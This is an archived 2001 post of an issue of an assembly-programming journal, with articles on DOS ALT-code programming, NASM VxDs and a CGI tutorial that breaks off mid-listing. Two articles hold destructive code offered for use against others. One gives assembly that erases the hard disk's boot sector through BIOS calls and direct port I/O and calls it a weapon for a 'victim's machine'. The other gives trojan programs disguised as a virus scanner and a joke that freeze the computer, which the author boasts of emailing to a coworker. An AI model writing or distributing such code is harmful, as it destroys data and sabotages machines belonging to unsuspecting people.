apj-announce · Announcement group
#18 From: "Michael Mondragon" <mammon_@...>
Date: Fri Aug 31, 2001 8:08 am
Subject: APJ Issue #9 Aug 01-Sept01
APJ issue coming from beyond the grave! Thanks to Tiago for taking this
over.

_m

::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                             Sep 00-Aug 01
:::\_____\::::::::::.                                            Issue 9
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction.............................................Tiago.Sanches

"Programming in extreme conditions".......................Kalmykov.b52

"Pestcontrols"...........................................Jan.Verhoeven

Column: Win32 Assembly Programming
     "How to write VxDs using NASM".............................therain
     "Common Gateway Interface using PE console apps"....Michael.Pruitt

Column: The Unix World
     "Writing A Useful Program With NASM".................Jonathan.Leto
     "Command Line in FreeBSD".........................G.Adam.Stanislav
     "Compressing data"...................................Feryno.Gabris

Column: PalmOS Environment
     "Hello Tiny World"..........................................Latigo

Column: Gaming Corner
     "Win32 ASM Game Programming - Part 2"..................Chris.Hobbs

Column: Assembly Language Snippets
     "Basic trigonometry functions"....................Eoin.O'Callaghan
     "getpass"................................................Jake.Bush
     "strcmp".................................................Jake.Bush
     "strlwr".................................................Jake.Bush
     "strupr".................................................Jake.Bush

Column: Issue Solution
     "Exact Pattern Matching Algorithms"...............Steve.Hutchesson
     "Binary String Search Algorithm".........................buliaNaza

----------------------------------------------------------------------
        +++++++++++++++++++Issue Challenge++++++++++++++++++
               Code a fast pattern matching algorithm
----------------------------------------------------------------------



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                               by Tiago Sanches


Finally, issue 9 is out!

After a long, long time APJ is back. What happened?

Well, mainly due to mammon_'s lack of free time to handle everything concerning
the journal by himself and whatnot (which may have led to a shortage of
contributions), APJ had to be discontinued as of last year. The good news is
that the journal is back, many people have volunteered to help out and so in
the future a staff may actually be a reality, allowing things to run smoother
than they have. On a side note, mammon_ is still administrating the journal,
even if time constraints don't allow him to get as involved in its management
as before.

Anyway, about this issue, there are articles ranging from CGI programming,
written by Michael Pruitt, to the continuation of Chris Hobbs' gaming series
(that Chili prepared for ASCII distribution). A new column has also been
created, concerning the emerging PalmOS platform, featuring a very good
introductory article by Latigo.

G. Adam Stanislav contributed another article for the Unix side, along with
Feryno Gabris, who presents an ELF compressor, whose text may look somewhat
cryptic at first if not for the source code provided, both NASM oriented. Also
for NASM, therain shows how to write VxDs and Jonathan Leto provided an article
for the beginning assembly programmer.

To close the list is a "back to the stone age" low-level programming article by
Kalmykov.b52 for when everything you have is MS-DOS and, lastly, it's Jan
Verhoeven's payback day as he says: "This time the joke is on you!".

All in all this issue is packed with very good articles, not to mention the
great trigonometry macros by Eoin O'Callaghan in the snippets section, as well
as some other pieces of code from Jake Bush and at the end the issue challenge
that this time focuses on pattern matching algorithms, featuring great work
done by Steve Hutchesson along with code presented by buliaNaza.

Just a reminder for contributors on submission guidelines: articles must be
written in English and may focus on any aspect of assembly language for any
level of programming, but remember that they must be in ASCII text format.
Here are some rules to follow:

     - lines should have a maximum of 80 characters (including the 'New Line'
       character), with no left or right margins.
     - article subsections should consist of a subsection name, a following
       line of hyphens to underscore and be preceded by two carriage returns.
     - Paragraphs should not be indented and must be separated by a blank
       line.
     - Code indentation (opcodes) should be about 8 chars.
     - Don't use TABs, use spaces instead!

That said, remember to supply a name or handle and a title for the article and
check the contents of the current issue for a general idea of the magazine's
format. You can mail the articles, snippets or any other contribution to me at:

     sanches@...

Hopefully, with your help, issue 10 will be out faster than this one and the
journal can start being released on a regular basis again.

As mammon_ would say, enjoy the mag!


Tiago Sanches



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                              Programming in extreme conditions
                                              by Kalmykov.b52


INTRODUCTION
------------
What are 'extreme conditions'? Imagine sitting in front of a computer with
only MS-DOS installed, without any compilers, hex editors, shells or
debuggers, and you need to recover lost data, delete a virus, or write a new
one. These are extreme conditions. Most programmers won't be able to do
anything, and most administrators think that such a computer is 100% secure.
But this won't stop the assembler programmer ...

I have chosen pure MS-DOS as the operating system to program for because
Windows has many things that make this task easier (e.g. Windows 98 has a
built-in browser with VBScript and JavaScript interpreters, so you can easily
write a hex editor and more).

This article should interest both beginners and experienced programmers. I
also recommend it to hackers, administrators, and anybody who wants to feel
the spirit of low-level programming, which is now disappearing with the
previous generation of programmers.


THE BEGINNING
-------------
To read and understand this you will need, at a minimum, knowledge of
assembler and experience working with MS-DOS. You will also need a list of
x86 instruction opcodes, an ASCII table, and a lot of free time. First of all,
we need some kind of text editor. But the administrator removed EVERYTHING
that could help us. There is only one thing that distinguishes a good
programmer from any other: deep knowledge of everything he works with. If he
works with DOS, he knows everything about it. There is a little-known function
that gives us a tiny text editor, and that's enough. Enter this DOS command:

C:\>copy con test.com

This starts the text editor: everything you type goes into test.com. This is
our instrument. But we still don't know how to write binaries. If you look in
the official MS-DOS manual, you'll find the answer. Using the ALT key and the
numeric keypad you can enter bytes by their decimal codes. First of all, check
that NumLock is on. Now press ALT, type 195, and release ALT. To save the file
and exit, press CTRL-Z and hit Enter. Now run it. It doesn't do anything, but
it doesn't hang the system either. If you disassemble it you will find that
test.com consists of only one instruction, RETN. As you have already guessed,
the opcode of RETN is 0xC3, which is 195 in decimal.


ADVANCED
--------
Well, that was easy. Now try to enter this:

ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT-32 Hi,world!$

Then press CTRL-Z and hit Enter. Clearly, this program prints "Hi,world!".
Let's disassemble it:

49E0:0100                       start:
49E0:0100  B4 09                               mov     ah,9
49E0:0102  BA 0109                             mov     dx,offset data_1
49E0:0105  CD 21                               int     21h ; DOS Services
                                                            ; ah=function 09h
                                                            ; display char
                                                            ; string at ds:dx
49E0:0107  C3                                   retn
49E0:0108  20                                   db      20h
49E0:0109  48 69 2C 77 6F 72    data_1          db      'Hi,world!$'
                                                         ; xref 49E0:0102
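
As a cross-check on the listing above, the keystroke sequence can be expanded
into bytes on any machine that does have tools. The following is only a sketch
in Python (not part of the original article); the helper name to_bytes is made
up for illustration.

```python
# Keystrokes from the text: integers are ALT codes, strings are typed as-is.
keys = [180, 9, 186, 9, 1, 205, "!", 195, 32, "Hi,world!$"]

def to_bytes(keys):
    out = bytearray()
    for k in keys:
        if isinstance(k, int):
            out.append(k)                   # ALT-nnn enters one byte, value nnn
        else:
            out.extend(k.encode("ascii"))   # ordinary keys enter ASCII codes
    return bytes(out)

image = to_bytes(keys)

# A .COM file is loaded at offset 0x100, so file position i is address 0x100+i.
for i in range(0, len(image), 8):
    row = " ".join(f"{b:02X}" for b in image[i:i + 8])
    print(f"{0x100 + i:04X}  {row}")
```

The dump should agree with the disassembly: nine code bytes starting at 0100,
then the string starting at 0109.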

I hope you know about the reversed byte order in a machine word (ALT-09 ALT-01
= 0x0109). Also, to show the beauty of this method, I used the symbol '!' ==
0x21 to encode the interrupt number 0x21. So knowing ASCII codes can make your
life easier. But why do we need the symbol (20h == ALT-32 == " ") at 49E0:0108?
This is the main problem of this method. Using ALT and the numeric keypad we
cannot enter some symbols. Here is a list of them:

         0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF)
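
The list above is easy to turn into a quick check. The sketch below (Python,
used here only as a desk calculator; mov_dx and bad_bytes are illustrative
names, and the set simply copies the list above) encodes mov dx,imm16 with the
low byte first and reports any byte that cannot be typed.

```python
import struct

# Byte values the article lists as impossible to enter with ALT + keypad.
UNTYPEABLE = {0, 3, 6, 8, 0x10, 0x13, 0x1B, 0xFF}

def mov_dx(imm16):
    """Encode `mov dx, imm16`: opcode 0xBA, then the word, low byte first."""
    return b"\xBA" + struct.pack("<H", imm16)

def bad_bytes(code):
    """Return the byte values in `code` that are on the untypeable list."""
    return sorted(set(code) & UNTYPEABLE)

for offset in (0x108, 0x109):
    code = mov_dx(offset)
    print(hex(offset), list(code), "untypeable:", bad_bytes(code))
```

With offset 0x108 the low byte 8 is flagged; with 0x109 nothing is.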

You will need to avoid these symbols. If you look at the code, you'll see that
without the extra byte the string would start at offset 0x108, and its low
byte (8) is on the list. After adding a symbol the offset became 0x109.
Actually, there is a more elegant way to do it:

         mov     dx,109h
         dec     dx

These two variants cost the same (dec dx is 1 byte, just like the padding
symbol), so choose what suits you best. Another problem is finding the offsets
of variables and labels. You can write the program on paper, giving the
variables symbolic names; once the program is complete it will be easy to find
the necessary offsets and addresses. Another possibility is declaring all
variables before their usage:

         mov     ah,9
         jmp     short $+20
         db      'Hi,world!$'
         mov     dx,0x100+2+2 ; 0x100 - the base address, 2 - length of
                              ; mov ah,9, 2 - length of jmp

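jmp short $+20 jumps 20 bytes past its own address, so after the 2-byte jmp
itself there are 18 bytes reserved for the string (pad the unused part with
any byte you can type). This method can also be used for labels.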
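
The paper bookkeeping described above can be sketched as a small table walk.
This Python fragment is only an illustration: the instruction lengths are the
usual 8086 encodings (2 bytes for mov ah,imm8 and jmp short, 3 bytes for
mov dx,imm16), and the 18-byte string area assumes that $ stands for the
address of the jmp itself.

```python
BASE = 0x100                       # .COM programs are loaded at offset 0x100

# (item, length in bytes) in the order the bytes are typed.
layout = [
    ("mov ah,9",       2),
    ("jmp short $+20", 2),
    ("string area",    18),        # 20 bytes counted from the jmp, minus jmp
    ("mov dx,imm16",   3),
]

offset = BASE
offsets = {}
for name, size in layout:
    offsets[name] = offset         # where this item starts
    offset += size                 # where the next one will start

for name, where in offsets.items():
    print(f"{where:04X}  {name}")
```

The string area starts at 0x100+2+2, the value loaded into dx in the listing,
and the instruction after it starts exactly 20 bytes past the jmp.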


THE EXAMPLE
-----------
I think you are tired of this theoretical programming and feel ready to see
this method at work. As an illustration we will create a program that erases
the boot sector. Attention! Using this program to destroy information is a
crime. You should use it only for experimental purposes.

First of all, let's write it in assembler:

B80103   mov     ax,00301
B90100   mov     cx,00001
BA8000   mov     dx,00080
CD13     int     013
C3       retn

As you see we have one #0 and two #3. Let's modify the program to avoid them:

         xor     ax,ax
         mov     ds,ax
         mov     ax,00299
         inc     ax
         inc     ax
         xor     cx,cx
         inc     cx
         mov     dl,80
         mov     bx,13h*4
         pushf
         cli
         push    cs
         call    dword ptr [bx]
         retn

Maybe this is quite a hard example. Assembler programming and interrupts are
not really the subject of this article; I can only refer you to other
references that you can easily find on the Internet. Fortunately (or
unfortunately, depending on the reader's orientation), the BIOS has a boot
sector write protection (sometimes called "Virus warning"). It will block any
attempt to modify the main boot sector.

For example, running this program under the Windows 98 operating system will
have no effect. But we can still work with the hard drive I/O ports at a low
level. Here is an example of a program that will erase the main boot sector
through the hard drive I/O ports:

         mov     dx, 1F2h
         mov     al,1
         out     dx,al
         inc     dx
         out     dx,al
         inc     dx
         xor     ax,ax
         out     dx,al
         inc     dx
         out     dx,al
         mov     al, 10100000b
         inc     dx
         out     dx,al
         inc     dx
         mov     al,30h
         out     dx,al
         lea     si, Buffer
         mov     dx, 1F0h
         mov     cx, 513
         rep     outsw

I don't know of any popular protection that can track and block that program.
However, this does not apply to Windows NT: that OS won't allow any program
without the necessary privileges to work with ports, and it will even close
the application's window. Preparing this example for entry using ALT and
optimizing its size I will leave as an exercise for the reader. That's all:
enter this on the victim's machine and you have a powerful weapon. I recommend
using it very carefully.


ENDING
------
It's not easy. All this requires a lot of experience and talent, but gives you
incredible power over the machine (and I hope you won't be using this power
for destruction). All this may look quite useless, and you can say that you
won't need it - but who knows?.. Nowadays the programmer depends on powerful
development tools (compilers, debuggers, editors), and when he is left alone
with 'nature' he cannot control the situation anymore - he cannot control the
machine ...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                               Pestcontrols
                                                               by Jan Verhoeven


Are you plagued now and then by friends and relatives who send you funny
pictures (mostly with a lot of "beneath the belt content") via E-mail?

I used to have them. I got rid of these pests.

How did I do it? I sent back some nice programs. And if they run Outlook
Express, they can't resist opening the attachment.

What I do is NOT make a virus. It is at best a trojan horse, but in fact it
doesn't even come close to a trojan. No harm is done (intentionally) unless
the victim is a real moron and starts an unknown executable.


Pestcontrol 1: the virus scanner
--------------------------------
Most of the aforementioned morons know of the existence of virus scanners. So
they will be more than eager to try out the latest one, especially if it is as
compact as this one:

name scan

lf equ 10
cr equ 13

mov dx, offset text
mov ah, 9
int 021 ; show some message

back: cli ; disable keyboard etc
jmp back ; and do it again

mov ax, 04C00 ; by the time pigs can fly, ...
int 021 ; ... the program is halted.

text db 'Scanning your system....', cr, lf
db 'Please wait a minute. $'
db 1023 dup (073)

Yes, you are right, this COM file is something like 1 Kb in size. You can
easily control the size by adjusting the value in the last line. Make sure to
remain well under the 64K limit, else the file cannot be a COM file anymore
and there is a chance that a wraparound will occur in which your main routine
will be overwritten.

I hesitate to explain the program. It's so damned simple. In part 1 the
message is printed to the screen. In part 2 the computer is crippled and in
part 3 the program returns to the command interpreter, only this point is
never reached.... :o)

Believe me: people will wait HOURS before they get worried and try to
Alt-Ctrl-Del themselves a way out of this problem. Only to find out that their
efforts are in vain.
If this program is run from within a DOS box under Windows, and the user had a
lot of other tasks open, he will lose any unsaved work. And if he or she is on
a network, it may be crippled as well.

So be a little bit careful who you treat to this attachment.....


Pestcontrol 2: something funny
------------------------------
We all like jokes, don't we? So we send each other large breasted photos and
such. I have a joke to send back to these persons. It's a real funny program,
believe me. And efficient.

name funny

cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM
mov es, ax
mov ds, ax
L1: cli ; INT's off again, just in case...
mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn of INT's?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.

db 22K dup ('Í ') ; add some more muscles.

This is a real nasty program. One of the guys at work (two windows away from
my place; I could see the results...) had been sending me several 500 Kb
funnies. I asked him to remove me from his mailing but he didn't listen. So I
shot back (hey, it was self defence!).

The first part of the program kills the keyboard and other interrupts, whereas
the second part plays a nasty trick on the user screen. I assume the user is
running Windows on a VGA screen.... It keeps on pumping ZEROs into display
memory in a loop that's almost impossible to stop. If the CPU would manage to
enable interrupts again it will lose control after another few nanoseconds (on
modern CPUs) or microseconds (on older ones).

The result is devastating: they run the FUNNY.EXE (if there is no MZ in the
exe-header, the program is considered a COM file) and the screen turns black
immediately and they lose all control of the machine. The three fingered
salute will not help. The only option is to pull the plug.

This executable did the trick. Four requests to relieve me from his mail
assaults did not work. One counterattack with my Funny Exe was effective
immediately.


Afterthoughts
-------------
Yes, these programs are nasties. They should NOT be copied or used too soon.
On the other hand, Windows is so clumsily programmed (there should be IO
Privileges on task switching instructions like IN, OUT and CLI but there
aren't) that it enables malicious software to cause the effects they do.


Reminder
--------
The code published here is GNU GPL. Don't try this at home.



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                   How to write VxDs using NASM
                                                   by therain


I.   About the readers and article's files overview
II.  MASM vs NASM : Syntax overview
III. A skeleton VxD
IV.  More VxD examples
V.   FAQs
VI.  About the writer


I. About the readers and article's files overview
-------------------------------------------------
This article is aimed at the user who already does a little Virtual Device
Driver (VxD) programming using Microsoft's Macro Assembler (MASM). It will
only cover how to use the Netwide Assembler (NASM) to write Virtual Device
Drivers and not how to learn VxD programming using NASM.
It is also suggested that the user be familiar with NASM or read the NASM
documentation.

As for the files in this article:

NASMVXD.TXT     -   This article.
VXDN.INC        -   Contains VxD related definitions and macros for NASM.
WINDDK.INC      -   This is used by VXDN.INC and shouldn't be directly
                     included by you. It contains VxD related EQU's and it
                     also has VxD services covering VMM,Shell,Debug,...


II. Overview about MASM & NASM
------------------------------
It is time to mention that NASM was never intended to produce VxD files and
you won't be able to produce any without the include files from this package
and without Microsoft's Incremental Linker (LINK.EXE).

Okay, now the syntax differences between MASM & NASM.

Processor Mode:
---------------
To enable the use of 386+ protected mode instructions you used to put a
'.386p' in MASM; there is no need for that in NASM. However, you have to
explicitly set the default bitness to 32 via the 'BITS 32' directive (and to
16 in the real mode initialization segment).

     MASM:    .386p
     NASM:    BITS 32

Segments specification:
-----------------------
MASM has a lot of segment declaration macros, unlike NASM, in which you have
to name the segment as you stated it in the .DEF file.

The 5 basic segment definition macros are:

     MASM:                    NASM:            Description
     -----                    -----            -----------
     VxD_CODE_SEG/ENDS        segment _LTEXT   Protected mode code seg.
     VxD_DATA_SEG/ENDS        segment _LDATA   Protected mode data seg.
     VxD_ICODE_SEG/ENDS       segment _ITEXT   Protected mode initialization
                                               code segment. (usually optional)
     VxD_IDATA_SEG/ENDS       segment _IDATA   Protected mode initialization
                                               data segment. (usually optional)
     VxD_REAL_INIT_SEG/ENDS   segment _RTEXT   Real mode initialization
                                               segment. (optional too)

Notice that NASM does not need a segment closing macro unlike MASM.

To start a new segment just declare it like 'segment _LTEXT' and everything
after that line will go to that segment.

Please do not use the intrinsic form of the segment macro (e.g.
[segment _LTEXT]) as certain VxD macros rely on saving/restoring the current
segment and they would fail should you use the intrinsic form.

Check the FAQ for a brief segment overview or NASMDOC.TXT for full overview.

Virtual Device Descriptor Block (DDB) Declaration:
--------------------------------------------------

     MASM:
     -----
     Declare_Virtual_Device Name, MajorVer, MinorVer, CtrlProc, DeviceNum,
                            InitOrder, V86Proc, PMProc, RefData

     NASM:
     -----
     Due to the fact that NASM does not support string concatenation in
     macros yet (there exist patched versions which do), the declaration is a
     bit different:

     Declare_Virtual_Device Name, 'Name', MajorVer, MinorVer, CtrlProc,
                            DeviceNum, InitOrder, V86Proc, PMProc, RefData

     Params 5 to 9 are optional, since most of the time they are generic (not
     used).

     The extra parameter is 'Name' which will become the DDB_Name field in
     the DDB (this is the name by which the VxD will be known to the VMM),
     Name itself determines the name for the Control Procedure and the
     Service Table (if used).

     The DDB must be declared inside the _LDATA segment.

     Example:

     segment _LDATA
     Declare_Virtual_Device SAMPVXD1, 'SAMPVXD1', 1, 0, SAMPVXD1_Control

Control Procedure Definition:
-----------------------------

     MASM:
     -----
     Begin_Control_Dispatch NAME
         Control_Dispatch Message,Proc
     End_Control_Dispatch

     NASM:
     -----
     This will be a little new for you since you have to do it by hand and
     not by similar macros:

     segment _LTEXT

     VXDNAME_Control:
         cmp  eax,VM_INIT
         je   OnVmInit

         cmp  eax,W32_DEVICEIOCONTROL
         je   OnDIOC

         cmp  eax,<system message>
         je   <Desired Event handler proc>

         clc  ; At any time during initialization, a virtual device can set
              ; the carry flag and return to the VMM to prevent the virtual
              ; device from loading. This means that the carry flag must be
              ; cleared to allow loading.

         retn

     OnVmInit:
         ; Do some code
         ret

     OnDIOC: ; OnDeviceIoControl
         ; ESI points to a DIOCParams struct
         cmp   dword [esi+DIOCParams.dwIoControlCode],MY_DIOC_CODE
         je    domycode

         retn   ; Don't forget the return, placed where you would normally
                ; write "EndProc procname" in MASM

Any Other procedure Definition
------------------------------
Using NASM's normal procedure definition you can define a new proc as
usual: "procname:".
As for calling conventions, you have to access the stack yourself or use some
other NASM macros.

Using VxDCall and VMMCall
-------------------------
In NASM you can call: VMMCall Service,param1,{param2},[ [{]param3[}] ],....


III. A skeleton VxD
--------------------
A skeleton VxD is a very basic VxD, just enough to be loaded correctly and do
nothing more than take up memory. =)

In NVXDSKEL.DEF you can specify whether it will be a DYNAMIC or a STATIC VxD,
like:

VXD MYVXD DYNAMIC  ; dynamic vxd
VXD MYVXD          ; static vxd

NVXDSKEL.DEF
------------

VXD NVXDSKEL DYNAMIC

SEGMENTS
   _LTEXT      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _LDATA      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _TEXT       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _DATA       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   CONST       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _ITEXT      CLASS 'ICODE'   DISCARDABLE
   _IDATA      CLASS 'ICODE'   DISCARDABLE
   _PTEXT      CLASS 'PCODE'   NONDISCARDABLE
   _PDATA      CLASS 'PDATA'   NONDISCARDABLE SHARED
   _STEXT      CLASS 'SCODE'   RESIDENT
   _SDATA      CLASS 'SCODE'   RESIDENT
   _DBOSTART   CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBOCODE    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBODATA    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _RCODE      CLASS 'RCODE'

EXPORTS
   NVXDSKEL_DDB @1

NVXDSKEL.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device NVXDSKEL,'NVXDSKEL',1,0,NVXDSKEL_Control

segment _LTEXT

NVXDSKEL_Control:
         clc
         retn

Assembling and linking:
-----------------------
* To assemble you must have NASM v0.98+
NASM NVXDSKEL.ASM -f win32
LINK NVXDSKEL.OBJ /VXD /DEF:NVXDSKEL.DEF

That's it!


IV. More VxD examples
---------------------
This example will show the use of VMMCall and VxDCall

VXDSAMP1.DEF
------------

VXD VXDSAMP1 DYNAMIC

SEGMENTS
   _LTEXT      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _LDATA      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _TEXT       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _DATA       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   CONST       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
   _ITEXT      CLASS 'ICODE'   DISCARDABLE
   _IDATA      CLASS 'ICODE'   DISCARDABLE
   _PTEXT      CLASS 'PCODE'   NONDISCARDABLE
   _PDATA      CLASS 'PDATA'   NONDISCARDABLE SHARED
   _STEXT      CLASS 'SCODE'   RESIDENT
   _SDATA      CLASS 'SCODE'   RESIDENT
   _DBOSTART   CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBOCODE    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _DBODATA    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
   _RCODE      CLASS 'RCODE'

EXPORTS
   VXDSAMP1_DDB @1

VXDSAMP1.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device VXDSAMP1,'VXDSAMP1',1,0,VXDSAMP1_Control

segment _LTEXT

VXDSAMP1_Control:
         cmp  eax,W32_DEVICEIOCONTROL
         je   OnDIOC

         clc
         retn

OnDIOC:
         cmp  dword [esi+DIOCParams.dwIoControlCode],1
         je   .1

         xor  eax,eax
         jmp  .ret
         .1:

         VMMCall Get_Sys_VM_Handle

         xor   esi,esi ; no callback
         xor   edx,edx ; no ref data for callback
         mov   eax,0
         mov   ecx,Msg
         mov   edi,Title
         VxDCall SHELL_Message

        .ret:
         retn

segment _LDATA
Msg   db 'Hello world!',0
Title db 'Title!',0

<EOF>

And another example that calls Int21/Ah=02,dl=7 to beep.

VXDSAMP2.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device VXDSAMP2,'VXDSAMP2',1,0,VXDSAMP2_Control

segment _LTEXT

VXDSAMP2_Control:

         cmp  eax,W32_DEVICEIOCONTROL
         je   OnDIOC

         clc
         retn

OnDIOC:
         cmp  dword [esi+DIOCParams.dwIoControlCode],1
         je   .1

         xor  eax,eax
         jmp  .ret

         .1:
         VxDCall Begin_Nest_V86_Exec

         mov word [ebp+CRS.EAX],0x0200
         mov word [ebp+CRS.EDX],0x0007
         mov eax,0x21

         VxDCall Exec_Int

         VxDCall End_Nest_Exec

        .ret:
         retn
<EOF>

Use a .DEF like the previous example but change the name to the new VxD name.

To test the last two examples, just open the VxD with CreateFileA() and then
issue a DeviceIoControl() with code 1.


V. FAQs
-------
Q) Where can I get NASM and LINK from?
A) As for NASM you can get it from:
      http://www.web-sites.co.uk/nasm/
    As for LINK.EXE you can get it from the DDK or just download the MASM Pack
    from http://win32asm.cjb.net

Q) How can I add new services and use them with NASM?
A) You can start by defining:

    MyDevice_DeviceID equ 0x1234 ; must be word

    and then define a service table like:

    Begin_Service_Table MyDevice
       VMM_Service MyService0                 ; 0x0000 ord
       VMM_Service MyService1                 ; 0x0001 ord
       VMM_Service MyServiceN                 ; ord N
    End_Service_Table MyDevice


VI. About the writers
---------------------
I, therain, would like to credit:

fOSSiL
   &
The Owl  - For creating VXDN.INC and
            for showing how to write VxDs in NASM in the first place
            by demonstrating it in IceDump (visit: http://icedump.tsx.org).
            And for reviewing/editing this document.

Iczelion - For his awesome win32asm resource site and for his
            good VxD tutorials. (visit: http://win32asm.cjb.net)

UKC Team - For their support.


[The VXDN.INC and WINDDK.INC files can be obtained from

http://asmjournal.freeservers.com/files/nasmvxd.zip

where they have been archived along with the text of the article.]



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                 Common Gateway Interface using PE console apps
                                 by Michael Pruitt


CGI: Tutorial 01: Supplying Dynamic Data to a Web Client
--------------------------------------------------------
In the early '90s the NCSA released HTTPd 1.0 (a web server), which included a
new concept: CGI.  This feature allowed web content to be dynamically
generated on the server.  Up-to-date reports of stocks, scores, and weather
were possible with CGI.  Other uses include message boards, guest books, or
e-stores.

Typically a CGI application will interface with a Mosaic type web browser,
supplying HTML with the data.  When the server receives a request targeting a
CGI program, it will launch the application.  Any data from the client will be
piped to StdIn.  The app's StdOut will then be sent back to the client.


Tools Needed
------------
This tutorial is written for FAsm (http://omega.im.uj.edu.pl/~grysztar/). If
you wish to assemble the program, you will need FAsm 1.13.4 (or later) or you
can translate it to an assembler supporting 80x86 PE console.

For any CGI testing, access to a web server is a must. I recommend Apache
1.3.20 (http://httpd.apache.org/). For starting out, you can place your
assembled executable into the \Apache\cgi-bin\ directory. For the server name
use "localhost" (excluding the quotes).

Knowledge of HTML (HyperText Markup Language) is useful. The basics of HTML
are easy to learn. CSS (Cascading Style Sheets) will prove invaluable if you
use a lot of HTML. A list of books is provided at the end of this article.

You also need a Win32 platform. My system consists of Win 98 SE on a Celeron
433 w/ 128MB RAM. Win 95 through NT should work without issues. A Linux box
running WINE should also work for those with a strong stomach.


Win32 API
---------
Since everything a CGI application does is non-GUI, kernel32.dll will suffice
for most projects.  Database-intensive apps will link to other DLLs to better
implement their designs.

To access the Standard I/O, you will need to use GetStdHandle.  Under Win32,
StdIO is not available through predefined handle values.  ReadFile and
WriteFile are used to move data.  ReadConsole and WriteConsole will not work,
because they fail on handles that have been redirected, and the server pipes
a CGI program's StdIn and StdOut.


CGI Environment
---------------
A CGI program is not required to read data, but it is required to send it.
Data sent in the request body (for example by a POST) is available on StdIn;
its length is in the CONTENT_LENGTH environment variable.  Data appended to the
URL after a "?" (for example by a GET) is in the QUERY_STRING EnvVar.  All
output must start with "Content-Type:", a space, the type, and two newlines
(CrLf).  Common types include: "text/plain", "text/html", or "image/gif".
Example output:

         Content-Type: text/plain

         Hello World. Example of HTTP 1.1 header and body.

If you don't write any data, the web server will respond with the error:
"Premature end of script headers".  If you really don't want to supply data,
you could just write: "Content-Type: text/plain" and two newlines.
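
For readers who think in C, the header rule above can be sketched as follows.
This is only an illustration, not part of the FAsm program: cgi_response is a
hypothetical helper name, and the buffer sizes are arbitrary.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Build a minimal CGI response in `out`: the Content-Type header line, an
 * empty line (two CrLf pairs in total), then the body.
 * Returns the number of bytes produced (not counting the terminating NUL),
 * or -1 if the response does not fit in `cap` bytes.
 * cgi_response is a hypothetical name used only for this sketch. */
int cgi_response(char *out, size_t cap, const char *type, const char *body)
{
    assert(out != NULL && type != NULL && body != NULL);
    int n = snprintf(out, cap, "Content-Type: %s\r\n\r\n%s", type, body);
    if (n < 0 || (size_t)n >= cap)
        return -1;
    return n;
}
```

A CGI program would then write the returned number of bytes from the buffer
to its standard output, exactly as the assembly version does with WriteFile.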


The Example Program
-------------------
The program I've supplied writes HTML containing the current date and time.
It demonstrates the use of API calls, HTML, and data manipulation.


~~~~~~~~~~~~~~~~~~~|||-------------------[code]-------------------|||
format PE console
entry Start

include '\Asm_Win32\Include\_Kernel.inc'
include '\Asm_Win32\Include\macro\stdcall.inc'
include '\Asm_Win32\Include\macro\import.inc'

    Cr    = 0x0D
    Lf    = 0x0A
;***---------------------------------------------------------------***
section '.code' code readable executable
Start:
     pusha                                        ;Save all of the Registers
     stdcall [GetStdHandle], STD_OUTPUT_HANDLE    ;Retrieve the actual handle
     mov     [StdOut], eax
     cmp     eax, INVALID_HANDLE_VALUE            ;Error with handle
     jz      Exit

Get_Time:
     stdcall [GetSystemTime], Time                ;Load SYSTEMTIME with UTC
     call    Format_Time                          ;Convert Hex(bin) to ascii
                                                  ; and Place into HTML
Write:
     stdcall [WriteFile], [StdOut], HTML, HTML._size, HTML.Len, 0
                                                  ;Write the HTML to StdOut
Exit:
     popa                                         ;Restore all of the Registers
     stdcall [ExitProcess], 0

;***-------------------------[Subroutine]--------------------------***
Format_Time:
     mov     ax, [Time.wYear]                     ;16b Data
     mov     edi, HTML.Date_S + 9                 ;Ptr to LAST byte of dest
